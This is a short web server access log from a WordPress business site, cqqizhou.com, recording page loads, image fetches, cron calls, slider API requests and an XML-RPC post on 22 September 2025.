149.50.103.48 - - [22/Sep/2025:10:05:18 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [22/Sep/2025:10:20:07 +0800] "POST /wp-cron.php?doing_wp_cron=1758507607.1770920753479003906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
51.210.194.206 - - [22/Sep/2025:10:20:07 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
205.169.39.1 - - [22/Sep/2025:10:27:16 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.1 - - [22/Sep/2025:10:27:17 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.1 - - [22/Sep/2025:10:27:18 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1756373176" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.1 - - [22/Sep/2025:10:27:18 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.1 - - [22/Sep/2025:10:27:18 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.1 - - [22/Sep/2025:10:27:19 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.1 - - [22/Sep/2025:10:27:19 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
36.133.115.36 - - [22/Sep/2025:10:27:20 +0800] "POST /wp-cron.php?doing_wp_cron=1758508040.4187059402465820312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
205.169.39.1 - - [22/Sep/2025:10:27:20 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.1 - - [22/Sep/2025:10:27:20 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled.webp HTTP/1.1" 200 203290 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.1 - - [22/Sep/2025:10:27:21 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.1 - - [22/Sep/2025:10:27:21 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.1 - - [22/Sep/2025:10:27:21 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.1 - - [22/Sep/2025:10:27:21 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.1 - - [22/Sep/2025:10:27:21 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.1 - - [22/Sep/2025:10:27:21 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
